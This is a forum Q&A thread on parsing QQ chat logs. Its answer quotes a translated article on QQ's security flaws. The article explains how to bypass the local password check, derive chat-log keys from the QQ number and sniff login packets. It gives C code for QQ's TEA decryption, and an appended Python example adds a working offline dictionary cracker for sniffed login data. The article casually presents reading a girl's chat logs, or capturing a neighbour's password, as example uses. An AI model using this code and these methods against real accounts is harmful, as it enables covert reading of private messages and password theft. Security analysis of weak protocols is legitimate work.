QQ chat log parser

Nobuo Miwa
Hello Experts,

I have to write a QQ chat log parser.

I'm looking for QQ chat log parser source code or any documents that would help me program it.
I know that the QQ chat log is encrypted with Blowfish but don't know how to decrypt it.
Someone says it is encrypted with the ID code plus some letters as the key.

Please give me any information.
IT Manager, Top Expert 2010
Maybe the info below is what you want.

"QQ chat-log cracking and the QQ chat-log encryption algorithm

QQ, formerly OICQ, the instant-messaging software developed by TENCENT, is the undisputed boss of the domestic Chinese IM market. Almost every Chinese netizen has at least one QQ number; more people know it than know me, so it needs no introduction.
This article talks about QQ's security problems. For software with such phenomenal popularity, its security is disproportionately poor. Basically, QQ has no privacy at all! In addition, it brings a lot of security risks to your computer. Those with insight, like me, long ago stopped using QQ.
1. Locally saved password
Without asking the user's agreement, the QQ client keeps the user's password locally, after tens of thousands of rounds of MD5. Every login runs a local authentication pass before any network data is sent; I believe people familiar with QQ know this already. This hands an attacker the chance to brute-force the QQ password, as long as he can get hold of the locally saved data. The file was once called ewh.db or user.db; I do not know whether that has changed. Because the MD5 is applied tens of thousands of times this attack is not efficient, but even at that low efficiency, running through a list of idiotic passwords and then trying the hits online, what is there to stop that?
If you choose automatic login, the password MD5 is saved in oicq2000.cfg and cracking speed increases greatly.
2. Local chat-log viewing loophole
The typical attack scenario: you have obtained all the local records, a folder named after a QQ number, but do not know the password (or, as it is commonly called, you "forgot" the password; most of the time the records belong to a girl you know). How do you view the chat history?
The QQ login process is: 1. enter user name and password -> 2. local validation passes -> 3. user interface (the penguin starts flashing) -> 4. login packet sent -> 5. login-success response received -> 6. login succeeds.
At step 3 the chat history is already visible. If step 2 fails you are asked to re-enter the password; if step 5 fails the step-3 user interface exits. For an attacker without the correct password, staying in state 3 to view the local chat logs means fooling step 2 and preventing step 4. The QQ software is encrypted (packed), yet it is very easy to patch one jump and be done. Step 4 is even easier: pull the network cable or set a firewall rule. There are many such modification tutorials and modified clients online, so I will not repeat them.
3. Local chat-log encryption method
What was described above is simply a way to get around the local check. If you would rather not use the existing client, you can write your own tool to view the chat logs, because the encryption is so fragile.
First some common knowledge: TEA (Tiny Encryption Algorithm) is an encryption algorithm in the formal cryptographic sense; you can find the original paper introducing it at http://www.ftp.cl.cam.ac.uk/ftp/papers/djw-rmn/djw-rmn-tea.html. QQ's encryption, both local file encryption and network packet encryption, mainly uses this algorithm. Worth noting is that the original authors use 32 rounds (and even at 32 rounds the algorithm has been shown to be vulnerable to known-plaintext attack), whereas TENCENT reduced it to 16. That saves half the time, but security declines seriously. We will revisit the algorithm later; for now it is enough to know that the algorithm is public. (Obviously; if it were not public there would not be so many open-source QQ clients, such as lumaQQ.)
QQ's local history data, including chat logs and some other logs, are encrypted with a key into the local Msg.db or MsgEx.db, but this key is the MD5 of the QQ number, stored in a local file. In other words, knowing the QQ number is enough to decrypt these files. And what is the QQ number? It is the name of the directory!
Of course, if you enable local message encryption the situation is slightly better, depending on the strength of your local encryption password. But how few people bother to set that up?
4. The flood of Trojans, and Windows HOOKs
I think QQ password security is the problem we are most concerned about. The network is full of articles and tools for stealing QQ passwords; in fact the vast majority are harder and harder to use, and some so-called password-stealing tools are themselves Trojans that steal your password. The main principle of these tools is to hook, determine the name of the current window, capture the keyboard, and send the data back in some way. In fact planting the Trojan itself is already the hard part. Add a little security awareness on the victim's side plus a decent firewall, and these tools find it hard to succeed.
Another notorious class of QQ virus, commonly known as the "QQ tail", mostly uses the same principle: find the window and send a message.
To solve these problems TENCENT has done a lot of work, such as making the window name empty (what you actually see as the window name is painted on), the soft keyboard, and password protection, but unfortunately none of it is good enough.
5. Login packets can be sniffed, and the password brute-forced offline
This is a very serious problem and can lead to the loss of the password; it is more serious than the previous one. The attacker no longer needs to plant a Trojan; a sniffer is all he needs.
Casually analysing the QQ program, or reading the open-source QQ programs, we know that ordinary packets use a negotiated key, but the QQ login request packet does not: a temporary key is written before the data segment, which means the packet can easily be decrypted. What does this packet contain? It contains the MD5 of the QQ password, or an empty string encrypted with that MD5: a 16-byte piece of data! The encryption algorithm is TEA. Most terrible of all, with TENCENT's packaging of the algorithm mode, if you try to decrypt this binary data with an unrelated key the decryption function returns an error, instead of returning some useless data and reporting success! This silly logic makes brute force extremely convenient. The actual attacker does not need to exhaust the 128-bit key; he only needs to guess likely passwords, apply MD5 twice, and use the result to try to decrypt the 16-byte data.
In short, if your password is simple enough, or is in a dictionary, then a malicious attacker with a sniffer, or one who runs a QQ proxy, can learn your password. The exhaustive search runs entirely on the attacker's own machine and is very fast, around 10^6 to 10^8 attempts per second. That speed means that any password of eight or fewer digits, six letters, or a simple alphanumeric combination is useless. As a countermeasure, I suggest ordinary users use a strong enough password and do not use any QQ proxy.
6. The working key, and real-time decryption of QQ data
QQ chat data is encrypted with a negotiated key, the working key, which is good. However, it turns out the key negotiation is done with a symmetric algorithm!? The QQ working key is generated randomly by the server and sent back (perhaps not random? Predictable? I do not have the QQ server source, so I do not know). While QQ stays online the key remains the same; if it is offline for some time the working key is updated. So two logins separated by a certain interval, about ten minutes, get different keys, and breaking the key once and for all is unrealistic. But with the QQ password MD5 the attacker can decrypt the QQ login-acknowledgement packet, and after decrypting it he can see the working key, a 16-byte combination of uppercase and lowercase letters plus digits. After that, all data from the client to the server can be decrypted completely with this working key. If point-to-point chat is needed, the key it requires is sent encrypted with the same algorithm and key. In short, from then on all QQ data can be considered plaintext.
If your password was stolen or cracked, the attacker will most likely make sure you do not notice, so that you do not change your password. He knows you have password protection, but do not think your QQ number is therefore safe: the attacker may be watching your chats at leisure. He can come online at any time to kick you off, or "help" you chat.
7. Too many, too complicated releases
QQ has far too many client versions: releases in various languages, the various "reign" editions, the XP version, beta versions, official releases, with dazzling names, and the key point is that they are all easy to use. In fact a successful C/S network product should not have too many client versions: they are hard to maintain and increase server overhead, and they also give others the opportunity to release their own versions. There are many popular unofficial QQ clients released by who knows whom: the "Shanhuchongban" (Coral Insect) version, ad-free versions, IP-display versions... all very popular, and which fool would not want one? Inevitably the password-stealing versions, prank versions and backdoored versions fish in these waters. Packing its own client is no problem for QQ, but it has no process inspection and no file-integrity-checking daemon. So careless; how does that deserve the trust of so many loyal users?
8. Places with no encryption at all
Perhaps because the data volume is too large, voice and video chat are not encrypted; they are transmitted in the clear, and anyone can watch and listen in online. If you log in to the WEB at www.qq.com, the password is sent in the clear too.
9. Chaotic plug-ins and chaotically added functions
The built-in browser is prepared by calling the IE control directly, so it fully inherits IE's functions as well as its vulnerabilities. We all know that IE vulnerability research is very active, so QQ is very dangerous along with it.
Online services such as QQ Show, Q coins, mobile phone services and so on are launched often, and every launch incidentally brings a bunch of loopholes. A lot of research on these has to be done online, which is risky, so I have not done it. Those with experience, please tell me.
Custom avatar loophole: it is said that QQ's custom avatar function once had a loophole leading to arbitrary code execution. I have not tried it myself, but I expect it is not false.
As you can imagine, the more features, the greater the potential danger! This is in fact a well-known principle of security software development. I therefore suggest playing with trial versions of new features as little as possible; a stable old version sometimes does more good than harm.
10. The same authentication method for other network services and products
The HTTP service, the "Triumph" game, the QQ game hall and so on can all be used with the QQ number plus the same password. Convenient for the user perhaps, but a taboo in security: the overall security drops to that of the weakest among them. Triumph and the game hall encrypt the client's user name and password the way QQ does, but HTTP is in the clear.
Now some scenarios.
For example: first, funnily enough, I can actually query http://service.qq.com to see whether any QQ number has applied for password protection, and then look up the girl next door. Then persuade her with reason and move her with love to go and apply for password protection, and open the sniffer at the same time. Hey, applying for password protection happens over the WEB and requires entering the password! You know what? Applying for password protection may itself be the process that loses the password, and incidentally the question and answer as well!
Another example: I am the network administrator and already have your password. I change your password; you do not have password protection, so you go and complain to a CGI called complaint, http://service.qq.com/cgi-bin/TellError. Then I know the password you once used, your real information, another QQ number... truly a bumper harvest. You call that a complaint? Well, playing this for all it is worth is a social-engineering attack, which is beyond the scope of this article.
Another example: you do have password protection; then there is your retrieval process, or the WEB login. Say, can the number's e-mail withstand a tool as simple as a sniffer? I will say no more.

Now let us appreciate the QQ decryption code.
#include <stdint.h>
#include <string.h>

/* Big-endian 32-bit load/store. The original called swapu32() on each word,
   which is the same thing on a little-endian x86 host. */
static uint32_t load_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static void store_be32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}

/* Decrypt one 8-byte block with Tencent's 16-round TEA; in and out may be the
   same buffer. uint32_t replaces the original "unsigned long", which is 64
   bits on LP64 systems and would break the modular arithmetic. */
void decrypt_qword(const unsigned char *in, const unsigned char *key,
                   unsigned char *out)
{
    uint32_t code[4];
    uint32_t i = 16, j = 0xE3779B90, m, n; /* j = 16 * delta, delta = 0x9E3779B9 */

    m = load_be32(in);
    n = load_be32(in + 4);
    code[0] = load_be32(key);     code[1] = load_be32(key + 4);
    code[2] = load_be32(key + 8); code[3] = load_be32(key + 12);

    while (i-- > 0) {
        n -= ((m >> 5) + code[3]) ^ ((m << 4) + code[2]) ^ (j + m);
        m -= ((n >> 5) + code[1]) ^ ((n << 4) + code[0]) ^ (j + n);
        j += 0x61C88647;                    /* j -= delta (mod 2^32) */
    }
    store_be32(out, m);
    store_be32(out + 4, n);
}

/* Absorb the next ciphertext block: q = D(q ^ C(i)), i.e. F(i-1) -> F(i).
   Returns 0 if the input runs out. *q1 and *i advance by 8. */
static int decrypt_round(unsigned char q[8], const unsigned char **q1,
                         int *i, int inlen, const unsigned char *key)
{
    int k;
    for (k = 0; k < 8; k++) {
        if (*i + k >= inlen) return 0;
        q[k] ^= (*q1)[k];
    }
    decrypt_qword(q, key, q);
    *i += 8;
    *q1 += 8;
    return 1;
}

/* Layout of a message: header byte (low 3 bits = count of random head bytes),
   the random head bytes, 2 random bytes, plaintext, 7 zero bytes.
   Returns 1 and fills out/*outlen on success, 0 on any error; a wrong key
   almost always fails the zero-trailer check, which is the oracle the
   article criticises. out must hold at least inlen bytes. */
int decrypt_msg(const unsigned char *in, int inlen, const unsigned char *key,
                unsigned char *out, int *outlen)
{
    unsigned char q[8], mkey[8];
    const unsigned char *q1, *q2;  /* q1: next block C(i); q2: previous block C(i-1) */
    unsigned char *outp;
    int count, i, j, p;

    if (inlen % 8 || inlen < 16) return 0;

    decrypt_qword(in, key, q);     /* q = F(0), the header block */
    j = q[0] & 0x7;                /* number of random head bytes */
    count = inlen - j - 10;        /* plaintext length */
    if (count < 0) return 0;
    *outlen = count;

    memset(mkey, 0, 8);            /* C(-1) = 0 */
    q2 = mkey;
    i = 8; p = 1;
    q1 = in + 8;
    j++;                           /* skip header byte and random head bytes */

    while (p <= 2) {               /* skip the 2 random padding bytes */
        if (j < 8) {
            j++;
            p++;
        } else if (j == 8) {
            q2 = in;
            if (!decrypt_round(q, &q1, &i, inlen, key)) return 0;
            j = 0;
        }
    }

    outp = out;                    /* P(i) = F(i) ^ C(i-1), byte by byte */
    while (count != 0) {
        if (j < 8) {
            *outp++ = q2[j] ^ q[j];
            count--;
            j++;
        } else if (j == 8) {
            q2 = q1 - 8;
            if (!decrypt_round(q, &q1, &i, inlen, key)) return 0;
            j = 0;
        }
    }

    for (p = 1; p < 8; p++) {      /* the 7 trailing bytes must decrypt to 0 */
        if (j < 8) {
            if (q2[j] ^ q[j]) return 0;
            j++;
        } else if (j == 8) {
            q2 = q1 - 8;           /* kept consistent with the loop above */
            if (!decrypt_round(q, &q1, &i, inlen, key)) return 0;
            j = 0;
        }
    }
    return 1;
}
The algorithm mode is briefly summarised as follows:
F(i) = P(i) + C(i-1),
C(i) = E(F(i)) + F(i-1)
P is the plaintext, C the ciphertext, and E the TEA algorithm acting on an 8-byte unit; the "+" is the XOR seen in the code above. Each step increments i by 1 and acts on one 8-byte block.
Two points in the design of QQ's encryption mode are worth looking at. One is that random bytes are introduced as head padding, which essentially guarantees that the same plaintext and key produce a completely different encryption result, and the mode is designed so that the decryption function can accurately discard this random part. That design is indeed good. The other point is done badly: the return value makes clear whether decryption succeeded.
At least two years ago, an article on the Tsinghua Crack board by "Tsing Yi ~ shadow in silence" already revealed this code, so it is no longer a secret. I traced and obtained this stuff myself, but still referred to Shufeng Tan's Net-OICQ-0.8 and Puzzlebird's Gaim QQ plug-in OpenQ-0.3.1; as for lumaQQ, I did not look, but I expect it is about the same.
In fact I have a guess: reducing TEA from 32 rounds to 16 must be extraordinarily dangerous. If you want to crack the algorithm, you can take a look at these references:
1) John Kelsey, Bruce Schneier, David Wagner, "Related-Key Cryptanalysis of 3-WAY, Biham-DES, CAST, DES-X, NewDES, RC2, and TEA"
2) Fauzan Mirza, "Block Ciphers And Cryptanalysis"

Due to limited time and technical ability, the above inevitably contains biased, inadequate, fallacious or out-of-date descriptions. Corrections are welcome.
doublelee [at.] etang.com
Following the rules, the acknowledgements: thank you teachers, classmates, leaders, colleagues, Mom and Dad, hey... alas, and if the occasional girl could be thanked too...
Quoted from:
http://info.52z.com/html/24862.html"

Source: http://hi.baidu.com/baiidu/item/1448c53560d8b191b90c03ee
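The mode the quoted article summarises, together with the "decryption returns an error for a wrong key" oracle it describes in section 5, in runnable form. This is an added example, not code from the article or from any QQ client: the 16-round TEA and the F/C chaining follow the C code and the formulas above, while the key derivation md5(md5(password)), the treatment of the sniffed 16-byte login blob as the empty string encrypted in this mode, and the sample passwords are assumptions made for the demonstration.

```python
"""QQ-style TEA message mode, added example mirroring the C decrypt_msg() above.

Assumptions not taken from the article: the login-guess key is
md5(md5(password)), and the sniffed 16-byte blob is the empty string
encrypted in this mode. All sample data below is constructed.
"""
import hashlib
import os
import struct

DELTA = 0x9E3779B9
ROUNDS = 16          # Tencent's cut-down TEA; the original cipher uses 32
MASK = 0xFFFFFFFF


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def tea_encipher(block: bytes, key: bytes) -> bytes:
    """Encrypt one 8-byte block; words and key are big-endian 32-bit."""
    y, z = struct.unpack(">II", block)
    a, b, c, d = struct.unpack(">IIII", key)
    s = 0
    for _ in range(ROUNDS):
        s = (s + DELTA) & MASK
        y = (y + (((z << 4) + a) ^ (z + s) ^ ((z >> 5) + b))) & MASK
        z = (z + (((y << 4) + c) ^ (y + s) ^ ((y >> 5) + d))) & MASK
    return struct.pack(">II", y, z)


def tea_decipher(block: bytes, key: bytes) -> bytes:
    """Inverse of tea_encipher; the same rounds as decrypt_qword() in C."""
    y, z = struct.unpack(">II", block)
    a, b, c, d = struct.unpack(">IIII", key)
    s = (DELTA * ROUNDS) & MASK        # 0xE3779B90, the C code's initial j
    for _ in range(ROUNDS):
        z = (z - (((y << 4) + c) ^ (y + s) ^ ((y >> 5) + d))) & MASK
        y = (y - (((z << 4) + a) ^ (z + s) ^ ((z >> 5) + b))) & MASK
        s = (s - DELTA) & MASK
    return struct.pack(">II", y, z)


def qq_encrypt(plain: bytes, key: bytes, rng=os.urandom) -> bytes:
    """Mode from the article: F(i) = P(i) ^ C(i-1), C(i) = E(F(i)) ^ F(i-1).
    Layout: 1 header byte (low 3 bits = number of random head bytes),
    that many random bytes, 2 random bytes, plaintext, 7 zero bytes."""
    pad = (len(plain) + 10) % 8
    if pad:
        pad = 8 - pad
    head = bytes([(rng(1)[0] & 0xF8) | pad]) + rng(pad) + rng(2)
    padded = head + plain + b"\x00" * 7    # length is a multiple of 8
    prev_c = prev_f = bytes(8)
    out = bytearray()
    for i in range(0, len(padded), 8):
        f = _xor(padded[i:i + 8], prev_c)
        c = _xor(tea_encipher(f, key), prev_f)
        out += c
        prev_c, prev_f = c, f
    return bytes(out)


def qq_decrypt(cipher: bytes, key: bytes):
    """Return the plaintext, or None when the layout or the zero trailer does
    not check out. That None is the oracle the article complains about: a
    wrong key is rejected instead of yielding garbage."""
    if len(cipher) % 8 or len(cipher) < 16:
        return None
    prev_c = prev_f = bytes(8)
    padded = bytearray()
    for i in range(0, len(cipher), 8):
        c = cipher[i:i + 8]
        f = tea_decipher(_xor(c, prev_f), key)   # F(i) = D(C(i) ^ F(i-1))
        padded += _xor(f, prev_c)                # P(i) = F(i) ^ C(i-1)
        prev_c, prev_f = c, f
    pad = padded[0] & 7
    count = len(cipher) - pad - 10
    if count < 0 or padded[-7:] != b"\x00" * 7:
        return None
    return bytes(padded[3 + pad:3 + pad + count])


def login_key(password: str) -> bytes:
    """Assumed derivation: the article says the attacker 'applies MD5 twice'."""
    return hashlib.md5(hashlib.md5(password.encode()).digest()).digest()


def crack_login_blob(blob: bytes, wordlist):
    """Dictionary attack on a sniffed blob using only the decrypt oracle."""
    for pw in wordlist:
        if qq_decrypt(blob, login_key(pw)) is not None:
            return pw
    return None


if __name__ == "__main__":
    key = login_key("qq123456")             # constructed victim password
    blob = qq_encrypt(b"", key)             # empty string -> exactly 16 bytes
    print(len(blob), crack_login_blob(blob, ["123456", "password", "qq123456"]))
```

With the default os.urandom the ciphertext differs on every call, which is the head-padding property the article praises; the zero-trailer check is what makes qq_decrypt return None for a wrong key, so crack_login_blob needs no knowledge of the plaintext at all, and an empty plaintext encrypts to exactly the 16 bytes the article mentions.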
Nobuo Miwa, Security Engineer


Great thanks !!
Nobuo Miwa, Security Engineer


I've requested that this question be closed as follows:

Accepted answer: 0 points for NobMiwa's comment #a38717820

for the following reason:

Great solution !
Nobuo Miwa, Security Engineer


Great solution
Jackie Man, IT Manager, Top Expert 2010

Glad to know your feedback.

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial